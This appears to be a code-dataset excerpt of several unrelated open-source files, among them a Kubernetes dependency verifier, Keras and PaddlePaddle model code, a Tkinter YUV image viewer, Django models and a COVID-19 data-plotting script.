# x = ax t + dx, y = ay t + dy , z = az t + dz
(ax, ay, az) = (vector.vector.x, vector.vector.y, vector.vector.z)
(dx, dy, dz) = position
# z=0平面との交点を求める
# 交点が無い場合
if az == 0:
return
t = - dz / az
x = ax * t + dx
y = ay * t + dy
point = PointStamped()
point.header = vector.header
point.point.x = x
point.point.y = y
point.point.z = 0
self.pub_.publish(point)
if __name__ == '__main__':
node = VectorPlaneProjector()
rospy.spin()
``` |
{
"source": "767829413/kubernetes",
"score": 2
} |
#### File: kubernetes/hack/verify-publishing-bot.py
```python
from __future__ import print_function
import fnmatch
import os
import sys
import json
def get_gomod_dependencies(rootdir, components):
all_dependencies = {}
for component in components:
with open(os.path.join(rootdir, component, "go.mod")) as f:
print(component + " dependencies")
all_dependencies[component] = []
lines = list(set(f))
lines.sort()
for line in lines:
for dep in components:
if dep == component:
continue
if ("k8s.io/" + dep + " =>") not in line:
continue
print("\t"+dep)
if dep not in all_dependencies[component]:
all_dependencies[component].append(dep)
return all_dependencies
def get_rules_dependencies(rules_file):
import yaml
with open(rules_file) as f:
data = yaml.safe_load(f)
return data
def main():
rootdir = os.path.dirname(__file__) + "/../"
rootdir = os.path.abspath(rootdir)
components = []
for component in os.listdir(rootdir + '/staging/src/k8s.io/'):
components.append(component)
components.sort()
rules_file = "/staging/publishing/rules.yaml"
try:
import yaml
except ImportError:
print("Please install missing pyyaml module and re-run %s" % sys.argv[0])
sys.exit(1)
rules_dependencies = get_rules_dependencies(rootdir + rules_file)
gomod_dependencies = get_gomod_dependencies(rootdir + '/staging/src/k8s.io/', components)
processed_repos = []
for rule in rules_dependencies["rules"]:
branch = rule["branches"][0]
# If this no longer exists in master
if rule["destination"] not in gomod_dependencies:
# Make sure we don't include a rule to publish it from master
for branch in rule["branches"]:
if branch["name"] == "master":
raise Exception("cannot find master branch for destination %s" % rule["destination"])
# And skip validation of publishing rules for it
continue
if branch["name"] != "master":
raise Exception("cannot find master branch for destination %s" % rule["destination"])
if branch["source"]["branch"] != "master":
raise Exception("cannot find master source branch for destination %s" % rule["destination"])
# we specify the go version for all master branches through `default-go-version`
# so ensure we don't specify explicit go version for master branch in rules
if "go" in branch:
raise Exception("go version must not be specified for master branch for destination %s" % rule["destination"])
print("processing : %s" % rule["destination"])
if rule["destination"] not in gomod_dependencies:
raise Exception("missing go.mod for %s" % rule["destination"])
processed_repos.append(rule["destination"])
processed_deps = []
for dep in set(gomod_dependencies[rule["destination"]]):
found = False
if "dependencies" in branch:
for dep2 in branch["dependencies"]:
processed_deps.append(dep2["repository"])
if dep2["branch"] != "master":
raise Exception("Looking for master branch and found : %s for destination", dep2,
rule["destination"])
if dep2["repository"] == dep:
found = True
else:
raise Exception(
"Please add %s as dependencies under destination %s in %s" % (gomod_dependencies[rule["destination"]], rule["destination"], rules_file))
if not found:
raise Exception("Please add %s as a dependency under destination %s in %s" % (dep, rule["destination"], rules_file))
else:
print(" found dependency %s" % dep)
extraDeps = set(processed_deps) - set(gomod_dependencies[rule["destination"]])
if len(extraDeps) > 0:
raise Exception("extra dependencies in rules for %s: %s" % (rule["destination"], ','.join(str(s) for s in extraDeps)))
items = set(gomod_dependencies.keys()) - set(processed_repos)
if len(items) > 0:
raise Exception("missing rules for %s" % ','.join(str(s) for s in items))
print("Done.")
if __name__ == "__main__":
sys.exit(main())
``` |
{
"source": "77007f/CNN",
"score": 3
} |
#### File: CNN/scripts/main.py
```python
from PIL import Image
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
from keras.models import Model # basic class for specifying and training a neural network
from keras.layers import Input, Convolution2D, MaxPooling2D, Dense, Dropout, Activation, Flatten
from keras.utils import np_utils # utilities for one-hot encoding of ground truth values
import numpy as np
import random as rand
from keras.models import load_model
from keras.callbacks import ModelCheckpoint
import keras
'''
This function reads accuracies of three generated models
This function read single value denoting accuracy from file named:-
accuracy1.txt, accuracy2.txt and accuracy3.txt
All the above files are present in folder named accuracy which is present in parent directory of script folder
'''
def get_accuracies():
filename = "../accuracy/accuracy1.txt"
with open(filename) as f:
accuracy1 = float(f.readline())
filename = "../accuracy/accuracy1.txt"
with open(filename) as f:
accuracy2 = float(f.readline())
filename = "../accuracy/accuracy1.txt"
with open(filename) as f:
accuracy3 = float(f.readline())
return accuracy1, accuracy2, accuracy3
'''
This function read all the images from test_images
It return a list containing name of all the test_images and their matrix representation in numpy array
'''
def read_input():
folder = "../test_images/"
FILE_NAMES = os.listdir(folder)
NEW_FILE_NAMES = []
for i in range(len(FILE_NAMES)):
im = Image.open(folder + FILE_NAMES[i])
im = im.resize((256, 256))
im.save(folder + "256X256_"+FILE_NAMES[i])
NEW_FILE_NAMES.append("256X256_"+FILE_NAMES[i])
read = lambda imname: np.asarray(Image.open(imname).convert("RGB"))
ims = [read(os.path.join(folder, filename)) for filename in NEW_FILE_NAMES]
for i in NEW_FILE_NAMES:
os.remove(folder+i)
X_test = np.array(ims, dtype='float32')
X_test /= np.max(X_test)
return FILE_NAMES,X_test
# Main Code begins here
if __name__ == "__main__":
# Read Accuracies of all the models
accuracy1, accuracy2, accuracy3 = get_accuracies()
# Read the input data
FILE_NAMES,X_test = read_input()
# Reading Model 1
model1 = load_model('../model/model1.h5')
prediction=model1.predict( X_test, batch_size=32, verbose=0)
y1_classes = prediction.argmax(axis=-1)
# Reading Model 2
model2 = load_model('../model/model2.h5')
prediction=model2.predict( X_test, batch_size=32, verbose=0)
y2_classes = prediction.argmax(axis=-1)
# Reading Model 3
model3 = load_model('../model/model3.h5')
prediction=model3.predict( X_test, batch_size=32, verbose=0)
y3_classes = prediction.argmax(axis=-1)
# Prediction using ensembling
for i in range(len(y1_classes)):
y1 = y1_classes[i]
y2 = y2_classes[i]
y3 = y3_classes[i]
Count = [0,0,0,0,0]
Count[y1] += 1
Count[y2] += 1
Count[y3] += 1
found = False
for j in range(len(Count)):
if Count[j] >= 2:
found = True
print(FILE_NAMES[i],"\t",j+1)
break
if not found:
if max(accuracy1,accuracy2,accuracy3) == accuracy1:
print(FILE_NAMES[i],"\t",y1+1)
elif max(accuracy1,accuracy2,accuracy3) == accuracy2:
print(FILE_NAMES[i],"\t",y2+1)
else:
print(FILE_NAMES[i],"\t",y3+1)
``` |
{
"source": "771979972/Paddle-pSp",
"score": 2
} |
#### File: Paddle-pSp/datasets/gt_res_dataset.py
```python
import os
from paddle.io import Dataset
from PIL import Image
class GTResDataset(Dataset):
def __init__(self, root_path, gt_dir=None, transform=None, transform_train=None):
self.pairs = []
for f in os.listdir(root_path):
image_path = os.path.join(root_path, f)
gt_path = os.path.join(gt_dir, f)
if f.endswith(".jpg") or f.endswith(".png"):
# self.pairs.append([image_path, gt_path.replace('.png', '.jpg'), None])
self.pairs.append([image_path, gt_path, None])
self.transform = transform
self.transform_train = transform_train
def __len__(self):
return len(self.pairs)
def __getitem__(self, index):
from_path, to_path, _ = self.pairs[index]
from_im = Image.open(from_path).convert('RGB')
to_im = Image.open(to_path).convert('RGB')
if self.transform:
to_im = self.transform(to_im)
from_im = self.transform(from_im)
return from_im, to_im
```
#### File: loss/lpips/lpips.py
```python
import paddle
import paddle.nn as nn
from configs.paths_config import model_paths
from models.loss.lpips.networks import get_network, LinLayers
class LPIPS(nn.Layer):
r"""Creates a criterion that measures
Learned Perceptual Image Patch Similarity (LPIPS).
Arguments:
net_type (str): the network type to compare the features:
'alex' | 'squeeze' | 'vgg'. Default: 'alex'.
version (str): the version of LPIPS. Default: 0.1.
"""
def __init__(self, net_type: str = 'alex', version: str = '0.1'):
assert version in ['0.1'], 'v0.1 is only supported now'
super(LPIPS, self).__init__()
# pretrained network
self.net = get_network(net_type)
# linear layers
self.lin = LinLayers(self.net.n_channels_list)
self.lin.set_state_dict(paddle.load(model_paths['lin_alex0.1']))
def forward(self, x: paddle.Tensor, y: paddle.Tensor):
feat_x, feat_y = self.net(x), self.net(y)
diff = [(fx - fy) ** 2 for fx, fy in zip(feat_x, feat_y)]
res = [l(d).mean((2, 3), True) for d, l in zip(diff, self.lin.model.sublayers())]
return paddle.sum(paddle.concat(res, 0)) / x.shape[0]
```
#### File: loss/lpips/networks.py
```python
from typing import Sequence
from itertools import chain
import paddle
import paddle.nn as nn
from paddle.vision import models
from configs.paths_config import model_paths
from models.loss.lpips.utils import normalize_activation
def get_network(net_type: str):
if net_type == 'alex':
return AlexNet()
elif net_type == 'squeeze':
return SqueezeNet()
elif net_type == 'vgg':
return VGG16()
else:
raise NotImplementedError('choose net_type from [alex, squeeze, vgg].')
class LinLayers(nn.Layer):
def __init__(self, n_channels_list: Sequence[int]):
super(LinLayers, self).__init__()
layers = [nn.Conv2D(nc, 1, 1, 1, 0, bias_attr=False) for nc in n_channels_list]
self.model = nn.Sequential(*layers)
class BaseNet(nn.Layer):
def __init__(self):
super(BaseNet, self).__init__()
# register buffer
self.register_buffer(
'mean', paddle.to_tensor([-.030, -.088, -.188]).reshape([1, 3, 1, 1]))
self.register_buffer(
'std', paddle.to_tensor([.458, .448, .450]).reshape([1, 3, 1, 1]))
def set_requires_grad(self, state: bool):
for param in chain(self.parameters()):
param.trainable = state
def z_score(self, x: paddle.Tensor):
return (x - self.mean) / self.std
def forward(self, x: paddle.Tensor):
x = self.z_score(x)
output = []
for i, (_, layer) in enumerate(self.layers._sub_layers.items(), 1):
x = layer(x)
if i in self.target_layers:
output.append(normalize_activation(x))
if len(output) == len(self.target_layers):
break
return output
class SqueezeNet(BaseNet):
def __init__(self):
super(SqueezeNet, self).__init__()
self.layers = models.squeezenet1_1(True).features
self.target_layers = [2, 5, 8, 10, 11, 12, 13]
self.n_channels_list = [64, 128, 256, 384, 384, 512, 512]
self.set_requires_grad(False)
class alexnet(nn.Layer):
def __init__(self, num_classes: int = 1000) -> None:
super(alexnet, self).__init__()
self.features = nn.Sequential(
nn.Conv2D(3, 64, kernel_size=11, stride=4, padding=2),
nn.ReLU(),
nn.MaxPool2D(kernel_size=3, stride=2),
nn.Conv2D(64, 192, kernel_size=5, padding=2),
nn.ReLU(),
nn.MaxPool2D(kernel_size=3, stride=2),
nn.Conv2D(192, 384, kernel_size=3, padding=1),
nn.ReLU(),
nn.Conv2D(384, 256, kernel_size=3, padding=1),
nn.ReLU(),
nn.Conv2D(256, 256, kernel_size=3, padding=1),
nn.ReLU(),
nn.MaxPool2D(kernel_size=3, stride=2),
)
self.avgpool = nn.AdaptiveAvgPool2D((6, 6))
self.classifier = nn.Sequential(
nn.Dropout(),
nn.Linear(256 * 6 * 6, 4096),
nn.ReLU(),
nn.Dropout(),
nn.Linear(4096, 4096),
nn.ReLU(),
nn.Linear(4096, num_classes),
)
def forward(self, x: paddle.Tensor) -> paddle.Tensor:
x = self.features(x)
x = self.avgpool(x)
x = paddle.flatten(x, 1)
x = self.classifier(x)
return x
class AlexNet(BaseNet):
def __init__(self):
super(AlexNet, self).__init__()
alexnet_ckpt = paddle.load(model_paths['alexnet'])
net = alexnet()
net.set_state_dict(alexnet_ckpt)
self.layers = net.features
self.target_layers = [2, 5, 8, 10, 12]
self.n_channels_list = [64, 192, 384, 256, 256]
self.set_requires_grad(False)
class VGG16(BaseNet):
def __init__(self):
super(VGG16, self).__init__()
self.layers = models.vgg16(pretrained=True).features
self.target_layers = [4, 9, 16, 23, 30]
self.n_channels_list = [64, 128, 256, 512, 512]
self.set_requires_grad(False)
``` |
{
"source": "772435284/QF-portfolio-investment-system",
"score": 3
} |
#### File: QF-portfolio-investment-system/environment/data.py
```python
import numpy as np
import pandas as pd
import matplotlib as plt
import datetime
import gym
import gym.spaces
eps = 1e-8
date_format = '%Y-%m-%d'
start_date = '2014-03-21'
end_date = '2020-10-14'
start_datetime = datetime.datetime.strptime(start_date, date_format)
end_datetime = datetime.datetime.strptime(end_date, date_format)
def date_to_index(date_string):
# Transfer the date to index 0, 1, 2 ,3...
return (datetime.datetime.strptime(date_string, date_format) - start_datetime).days
def index_to_date(index):
# Transfer index back to date
return (start_datetime + datetime.timedelta(index)).strftime(date_format)
# A class that is responsible for data processing
class DataProcessor(object):
def __init__(self, product_list, market_feature, feature_num, steps, window_length, mode, start_index=0, start_date=None):
import copy
self.train_ratio = 0.8
self.steps = steps + 1
self.window_length = window_length
self.window_size = 1
self.start_index = start_index
self.start_date = start_date
self.feature_num = feature_num
self.market_feature = market_feature
self.mode = mode
self._data= []
self.product_list = product_list
self.load_observations()
# Load data from the .csv files
def load_observations(self):
ts_d = pd.read_csv('Data/'+'D_'+'AUDUSD'+'.csv')
ts_d_len = len(ts_d)
csv_data = np.zeros((ts_d_len-self.window_size+1,self.feature_num, len(self.product_list),self.window_size ), dtype=float)
for k in range(len(self.product_list)):
product = self.product_list[k]
#print(product)
ts_d = pd.read_csv('Data/'+'D_'+product+'.csv')
ts_d = ts_d.dropna(axis=0,how='any')
for j in range(len(self.market_feature)):
ts_d_temp = ts_d[self.market_feature[j]].values
for i in range(len(ts_d)-self.window_size+1):
temp = np.zeros((self.window_size))
for t in range(i, i+self.window_size):
#temp = np.zeros((para_num))
temp[t-i] = ts_d_temp[t]
#print(temp)
csv_data[i][j][k] = temp
csv_data = csv_data[::-1].copy()
observations = csv_data
if self.mode == "Train":
self._data = observations[0:int(self.train_ratio * observations.shape[0])]
print("Shape for Train observations -- T: ", self._data.shape)
elif self.mode == "Test":
self._data = observations[int(self.train_ratio * observations.shape[0]):]
print("Shape for Test observations -- T: ", self._data.shape)
self._data = np.squeeze(self._data)
self._data = self._data.transpose(2, 0, 1)
def _step(self):
self.step += 1
obs = self.data[:, self.step:self.step + self.window_length, :].copy()
next_obs = self.data[:, self.step + self.window_length:self.step + self.window_length + 1, :].copy()
done = self.step >= self.steps
return obs, done, next_obs
def reset(self):
self.step = 0
if self.start_date is None:
# randomly sample date
self.idx = np.random.randint(
low=self.window_length, high=self._data.shape[1] - self.steps)
else:
self.idx = date_to_index(self.start_date) - self.start_index
assert self.idx >= self.window_length and self.idx <= self._data.shape[1] - self.steps, \
'Invalid start date, must be window_length day after start date and simulation steps day before end date'
data = self._data[:, self.idx - self.window_length:self.idx + self.steps + 1, :8]
self.data = data
return self.data[:, self.step:self.step + self.window_length, :].copy(), \
self.data[:, self.step + self.window_length:self.step + self.window_length + 1, :].copy()
``` |
{
"source": "772700563/MyBlogEntries",
"score": 3
} |
#### File: MyBlogEntries/Dijkstra/result.py
```python
from numpy import mean as mean
from numpy import std as std
def makeTable(Fs, Es):
As = []
for E in Es:
Rs = []
for F in Fs:
Ls = open("logs/"+E+".dat-"+F+".log")
Ds = []
for L in Ls:
A = L.split()
if A[0] == 'Time':
Ds.append(float(A[1]))
Rs.append([mean(Ds), std(Ds)])
As.append(Rs)
return As
def printTable(Fs, As):
for F in Fs:
print "|",F,
print
for A in As:
for R in A:
print str(round(R[0],3))+"(%.3f)"%round(R[1],2),
print
# Start the script here
Fs = ["dijkstra","dijkstra_bgl","dijkstra_lemon","dijkstra_or-tools"]
Es = ["rand_10000_100000","rand_10000_1000000","rand_10000_10000000"]
Gs = ["dijkstra","dijkstra_bgl","dijkstra_lemon"]
Hs = ["US-d.W", "US-d.E", "US-d.LKS", "US-d.CAL", "US-d.NE", "US-d.NW", "US-d.FLA", "US-d.COL", "US-d.BAY", "US-d.NY"]
Is = ["dijkstra_binary", "dijkstra_ternary", "dijkstra_skew", "dijkstra_lemon"]
for A,B in [[Fs,Es],[Gs,Hs],[Is,Hs]]:
Ts = makeTable(A,B)
printTable(A, Ts)
print
``` |
{
"source": "774no2danuma/YUV-Observer",
"score": 3
} |
#### File: YUV-Observer/v0.1.0.0/yuvobserver_gui.py
```python
import numpy as np
import os
import re
import sys
import cv2
import tkinter
from tkinter import *
from tkinter import ttk
import tkinter.filedialog
from PIL import Image, ImageTk
def import_yuv():
# ファイル選択ダイアログの表示
file_path = tkinter.filedialog.askopenfilename()
if len(file_path) != 0:
# ファイルが選択された場合
data = file_path
read_img(data)
else:
data = ''
def get_help():
print('menu2!')
def quit():
sys.exit()
def show_version():
u""" Tk() と同じような感じで使える """
sub_win = Toplevel(master = root.master)
sub_win.title('yuvObserver v0.1.0.0 - Version')
sub_win.geometry('350x100')
sub_win.resizable(width=False, height=False)
label = tkinter.Label(sub_win,
text='yuvObserverGUI.exe v0.1.0.0\nCopyright (c) <NAME>. CIT YYLab B4 2021\nAll rights reserved.',
font=('System', 10))
label.place(x=15, y=10)
button = Button(sub_win, text = 'OK', command = sub_win.destroy)
button.place(x=160, y=70)
u""" フォーカス移動 """
button.focus_set()
sub_win.transient(root.master)
sub_win.grab_set()
def read_img(path):
global u_img, v_img
image_path = path
fr = open(image_path, 'rb')
path_str = str(image_path)
size_p = str(re.findall('\((.*)\)', path_str))
size_s = size_p.split('x')
w = size_s[0].strip("[']")
h = size_s[1].strip("[']")
size_c = h.split(',YUV')
width = int(w)
height = int(size_c[0])
color = int(size_c[1])
print(width,height,color)
data = np.fromfile(fr, dtype=np.uint8)
data = np.ravel(data)
fr.close()
print('data len', len(data))
#rgb_arr = np.array([[1.164, 0, 1.596],
# [1.164,0.391, 0.813],
# [1.164, 2.018, 0]])
if color == 444:
wxh = width*height
y = np.array(data[:wxh])
u = np.array(data[wxh:wxh*2])
v = np.array(data[wxh*2:])
y = y.reshape(height,width)
u = u.reshape(height,width)
v = v.reshape(height,width)
yuv = np.stack([y,u,v],axis=2)
#r = np.array(rgb_arr[0,0]*(y)+rgb_arr[0,2]*(v)).astype(np.uint8)
#g = np.array(rgb_arr[1,0]*(y)-rgb_arr[1,1]*(u)-rgb_arr[1,2]*(v)).astype(np.uint8)
#b = np.array(rgb_arr[2,0]*(y)+rgb_arr[2,2]*(u)).astype(np.uint8)
#rgb = np.stack([r,g,b],axis=2)
rgb = cv2.cvtColor(yuv, cv2.COLOR_YUV2BGR)
elif color == 422:
wxh = width*height
wxh_ = (width//2)*height
y = np.array(data[:wxh])
u = np.array(data[wxh:wxh+wxh_])
v = np.array(data[wxh+wxh_:])
y = y.reshape(height,width)
u = u.reshape(height,width//2)
v = v.reshape(height,width//2)
y0 = np.expand_dims(y[:,::2], axis=2)
u = np.expand_dims(u, axis=2)
y1 = np.expand_dims(y[:,1::2], axis=2)
v = np.expand_dims(v, axis=2)
img_yuv = np.concatenate((y0, u, y1, v), axis=2)
img_yuv_cvt = img_yuv.reshape(img_yuv.shape[0], img_yuv.shape[1] * 2, int(img_yuv.shape[2] / 2))
rgb = cv2.cvtColor(img_yuv_cvt, cv2.COLOR_YUV2BGR_YUYV)
#r = np.array(rgb_arr[0,0]*(y-16)+rgb_arr[0,2]*(v_-128)).astype(np.uint8)
#g = np.array(rgb_arr[1,0]*(y-16)-rgb_arr[1,1]*(u_-128)-rgb_arr[1,2]*(v_-128)).astype(np.uint8)
#b = np.array(rgb_arr[2,0]*(y-16)+rgb_arr[2,2]*(u_-128)).astype(np.uint8)
#rgb = np.stack([r,g,b],axis=2).astype(np.uint8)
#rgb = cv2.cvtColor(yuv, cv2.COLOR_YUV2BGR_YUY2)
elif color == 420:
f = open(path,'rb')
yuv = np.frombuffer(f.read(width*height*3//2), dtype=np.uint8).reshape((height*3//2, width))
rgb = cv2.cvtColor(yuv, cv2.COLOR_YUV2BGR_I420)
f.close()
elif color == 400:
wxh = width*height
y = np.array(data[:wxh])
y = y.reshape(height,width)
rgb = Image.fromarray(y,'L')
show_img(rgb,width,height,path_str,color)
def show_img(data,w,h,path,c):
global canvas, u_img, v_img
root.title('yuvObserver v0.1.0.0 - '+path)
if c != 400:
image_rgb = cv2.cvtColor(data, cv2.COLOR_BGR2RGB)
image_pil = Image.fromarray(image_rgb) # RGBからPILフォーマットへ変換
else:
image_pil = data
image_tk = ImageTk.PhotoImage(image_pil) # ImageTkフォーマットへ変換
canvas.delete('img')
print(canvas)
canvas.create_image(0, 0, image=image_tk, anchor='nw', tag='img') # ImageTk 画像配置
canvas.grid(sticky=tkinter.W + tkinter.E + tkinter.N + tkinter.S)
#root.geometry("{0}x{1}".format(w,h))
canvas.configure(scrollregion=(0,0,w,h))
app = root
xbar = tkinter.Scrollbar(
app, # 親ウィジェット
orient=tkinter.HORIZONTAL, # バーの方向
)
# 垂直方向のスクロールバーを作成
ybar = tkinter.Scrollbar(
app, # 親ウィジェット
orient=tkinter.VERTICAL, # バーの方向
)
# キャンバスの下に水平方向のスクロールバーを配置
xbar.grid(
row=1, column=0, # キャンバスの下の位置を指定
sticky=tkinter.W + tkinter.E # 左右いっぱいに引き伸ばす
)
# キャンバスの右に垂直方向のスクロールバーを配置
ybar.grid(
row=0, column=1, # キャンバスの右の位置を指定
sticky=tkinter.N + tkinter.S # 上下いっぱいに引き伸ばす
)
# キャンバスをスクロールするための設定
# スクロールバーのスライダーが動かされた時に実行する処理を設定
xbar.config(
command=canvas.xview
)
ybar.config(
command=canvas.yview
)
# キャンバススクロール時に実行する処理を設定
canvas.config(
xscrollcommand=xbar.set
)
canvas.config(
yscrollcommand=ybar.set
)
root.mainloop()
def main():
read_img('bird-20(1024x672,YUV422).yuv')
if __name__ == '__main__':
root = Tk()
menubar = Menu(root)
# File Menu
filemenu = Menu(menubar, tearoff=0)
filemenu.add_command(label='YUV File Open', command=import_yuv)
filemenu.add_separator()
filemenu.add_command(label='Exit', command=quit)
# Help
helpmenu = Menu(menubar, tearoff=0)
helpmenu.add_command(label='Version', command=show_version)
helpmenu.add_command(label='Help', command=get_help)
# Add
menubar.add_cascade(label='File', menu=filemenu)
menubar.add_cascade(label='Help', menu=helpmenu)
root.config(menu=menubar)
root.title('yuvObserverGUI v0.1.0.0')
root.minsize(640,512)
root.rowconfigure(0, weight=1)
root.columnconfigure(0, weight=1)
frame1 = ttk.Frame(root)
frame1.rowconfigure(0, weight=1)
frame1.columnconfigure(0,weight=1)
canvas = tkinter.Canvas(root, width=500, height=500) # Canvas作成
canvas.grid()
if len(sys.argv) > 1:
read_img(sys.argv[1])
root.mainloop()
#main()
``` |
{
"source": "775269512/WHUT_CUMCM20",
"score": 3
} |
#### File: 选拔赛/code/q1.py
```python
import numpy as np
from math import *
import random
from bayes_opt import BayesianOptimization
a = 30
b = 20
len = 606#6060
wi = 216#2160
def get_theta(theta,a=a,b=b,l=len,w=wi):
theta = theta/360*pi
x = sqrt(4*a*b/(b*sin(theta)*sin(theta)+a*cos(theta)*cos(theta)))
i,j=0,0
ww = w
num=0
detal = x-x*cos(theta)
while j != int(ww / (2 * b)) + 1:
for i in range(int(l/(2*x*cos(theta)))):
num = num+1
# print(j,int(ww / (2 * b)))
j+=1
ww=w+j*1
return num
# get_theta(60)
#
rf_bo = BayesianOptimization(
get_theta,
{'theta': (30, 60),}
)
print(rf_bo.maximize())
import matplotlib.pyplot as plt
import numpy.random as rnd
from matplotlib.patches import Ellipse
detal = a-sqrt(3)*a/2
ells = []
j=0
h = wi
while j != int(h/(2*b))+1:
for i in range(int(len/(2*a))):
if j%2==0:
e = Ellipse(xy=[i*2*a+a,j*2*b+b-detal*j], width=a*2, height=b*2, angle=0)
else:
e = Ellipse(xy=[i*2*a+2*a,j*2*b+b-detal*j], width=a*2, height=b*2, angle=0)
ells.append(e)
print(j,int(h/(2*b)))
j = j+1
h = wi+detal*j
fig = plt.figure(figsize=(10,8))
ax = fig.add_subplot(111, aspect='equal')
for e in ells:
ax.add_artist(e)
e.set_clip_box(ax.bbox)
alf = rnd.rand()+0.1
alf = 1 if alf>1 else alf
e.set_alpha(alf)
# e.set_facecolor(rnd.rand(3))
ax.set_xlim(0, len)
ax.set_ylim(0, wi)
plt.show()
# plt.savefig("demo.png")
``` |
{
"source": "77598072/rabbitpy",
"score": 2
} |
#### File: rabbitpy/rabbitpy/__init__.py
```python
__version__ = '1.0.0'
import logging
from rabbitpy.amqp import AMQP
from rabbitpy.connection import Connection
from rabbitpy.channel import Channel
from rabbitpy.exchange import Exchange
from rabbitpy.exchange import DirectExchange
from rabbitpy.exchange import FanoutExchange
from rabbitpy.exchange import HeadersExchange
from rabbitpy.exchange import TopicExchange
from rabbitpy.message import Message
from rabbitpy.amqp_queue import Queue
from rabbitpy.tx import Tx
from rabbitpy.simple import SimpleChannel
from rabbitpy.simple import consume
from rabbitpy.simple import get
from rabbitpy.simple import publish
from rabbitpy.simple import create_queue
from rabbitpy.simple import delete_queue
from rabbitpy.simple import create_direct_exchange
from rabbitpy.simple import create_fanout_exchange
from rabbitpy.simple import create_headers_exchange
from rabbitpy.simple import create_topic_exchange
from rabbitpy.simple import delete_exchange
if hasattr(logging, 'NullHandler'):
NullHandler = logging.NullHandler
else:
"""Python 2.6 does not have a NullHandler"""
class NullHandler(logging.Handler):
def emit(self, record):
pass
logging.getLogger('rabbitpy').addHandler(NullHandler())
__all__ = [
'__version__',
'amqp_queue',
'channel',
'connection',
'exceptions',
'exchange',
'message',
'simple',
'tx',
'AMQP',
'Connection',
'Channel',
'SimpleChannel',
'Exchange',
'DirectExchange',
'FanoutExchange',
'HeadersExchange',
'TopicExchange',
'Message',
'Queue',
'Tx',
'consume',
'get',
'publish',
'create_queue',
'delete_queue',
'create_direct_exchange',
'create_fanout_exchange',
'create_headers_exchange',
'create_topic_exchange',
'delete_exchange'
]
``` |
{
"source": "776166/PythonDevTest",
"score": 3
} |
#### File: site/contacts/models.py
```python
import phonenumbers
from django.core.exceptions import ValidationError
from django.db import models
from phonenumber_field.modelfields import PhoneNumberField
def validate_phone(value):
try:
z = phonenumbers.parse(value, None)
except:
raise ValidationError(
('%(value)s is not a valid phone number'),
params={'value': value},
)
if phonenumbers.is_possible_number(z) == False:
raise ValidationError(
('%(value)s is not a valid phone number'),
params={'value': value},
)
class Model(models.Model):
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
class Meta:
abstract = True
@property
def model_name(self):
return self.__class__.__name__.lower()
class Contact(Model):
name = models.CharField('Name', max_length=256, blank=False, null=False)
company = models.CharField(
'Company', max_length=256, blank=False, null=False)
email = models.EmailField('Email', max_length=256, blank=False, null=False)
phone = PhoneNumberField(blank=True, validators=[validate_phone])
interest = models.CharField(
'Interests', max_length=256, blank=True, null=True)
def __str__(self):
return self.name
``` |
{
"source": "776166/yggdrasil-django",
"score": 2
} |
#### File: management/commands/engine_version.py
```python
from django.core.management.base import BaseCommand
from engine.version import VERSION_STRING
class Command(BaseCommand):
"""Return engine version.
Returns:
format <version in x.x.x format>-<date in YYYYMMDD format>-<revision whatever>
Ex: '0.1.0-19910220-1'
"""
help = 'Engine version (example: \'0.1.0-19910220-1\')'
def handle(self, *args, **options):
return(VERSION_STRING)
# print('%s-%s-%s' % (settings.VERSION['version'], settings.VERSION['date'], settings.VERSION['revision']))
```
#### File: site/social_auth/pipeline.py
```python
from social_core.pipeline.partial import partial
@partial
def require_email(strategy, details, user=None, is_new=False, *args, **kwargs):
if kwargs.get('ajax') or user and user.email:
return
elif is_new and not details.get('email'):
email = strategy.request_data().get('email')
if email:
details['email'] = email
else:
current_partial = kwargs.get('current_partial')
return strategy.redirect(
'/social_auth/email?partial_token={0}'.format(
current_partial.token)
)
``` |
{
"source": "777irug/Covid-19",
"score": 4
} |
#### File: 777irug/Covid-19/covidDataset.py
```python
import pandas as pd
import seaborn as sns
import matplotlib.pylab as plt
df=pd.read_csv("covid_19_india.csv",parse_dates=["Date"])
df.columns
df.dtypes
for x in df.columns:
print(x,df[x].isna().sum())
df['year']=df['Date'].dt.year
df['month']=df['Date'].dt.month
df=df.sort_values(by=['month'])
df.dtypes
def month(x):
if x==1:
return 'January'
elif x==2:
return 'Febraury'
elif x==3:
return 'March'
elif x==4:
return 'April'
elif x==5:
return 'May'
elif x==6:
return 'June'
elif x==7:
return 'July'
elif x==8:
return 'August'
elif x==9:
return 'September'
elif x==10:
return 'October'
elif x==11:
return 'November'
elif x==12:
return 'December'
df['month']=df['month'].apply(month)
#confirmed cases in india date-wise
#monthwise
c=input("Enter the State or Union Territory name: ")
state_info= df[df['State/UnionTerritory']==c]
ax=sns.lineplot(
data=state_info,
x="month", y="Confirmed", hue="year"
)
plt.xticks(rotation=70)
plt.tight_layout()
ax.set_title('No of confimed cases for '+c)
#cured
c=input("Enter the State or Union Territory name: ")
state_info= df[df['State/UnionTerritory']==c]
ax=sns.lineplot(
data=state_info,
x="month", y="Cured", hue="year"
)
plt.xticks(rotation=70)
plt.tight_layout()
ax.set_title('No of Cured cases for '+c)
#deaths
c=input("Enter the State or Union Territory name: ")
state_info= df[df['State/UnionTerritory']==c]
ax=sns.lineplot(
data=state_info,
x="month", y="Deaths", hue="year"
)
plt.xticks(rotation=70)
plt.tight_layout()
ax.set_title('No of Deaths for '+c)
#yearwise
c=input("Enter the State or Union Territory name: ")
y=int(input("Enter the year: "))
state_info= df[(df['State/UnionTerritory']==c) & ( df['year']==y)]
ax=sns.lineplot(
data=state_info,
x="month", y="Confirmed",hue="year", style="State/UnionTerritory",
)
plt.xticks(rotation=70)
plt.tight_layout()
ax.set_title('No of confimed cases for '+c+' in '+str(y))
c=input("Enter the State or Union Territory name: ")
y=int(input("Enter the year: "))
state_info= df[(df['State/UnionTerritory']==c) & ( df['year']==y)]
ax=sns.lineplot(
data=state_info,
x="month", y="Cured"
)
plt.xticks(rotation=70)
plt.tight_layout()
ax.set_title('No of Cured cases for '+c+' in '+str(y))
c=input("Enter the State or Union Territory name: ")
y=int(input("Enter the year: "))
state_info= df[(df['State/UnionTerritory']==c) & ( df['year']==y)]
ax=sns.lineplot(
data=state_info,
x="month", y="Deaths"
)
plt.xticks(rotation=70)
plt.tight_layout()
ax.set_title('No of Deaths for '+c+' in '+str(y))
ax=sns.lineplot(
data=state_info,
x="Date", y="Deaths"
)
plt.xticks(rotation=70)
plt.tight_layout()
ax.set_title('No of Deaths for '+c+' in '+str(y))
c=input("Enter the State or Union Territory name: ")
y=int(input("Enter the year: "))
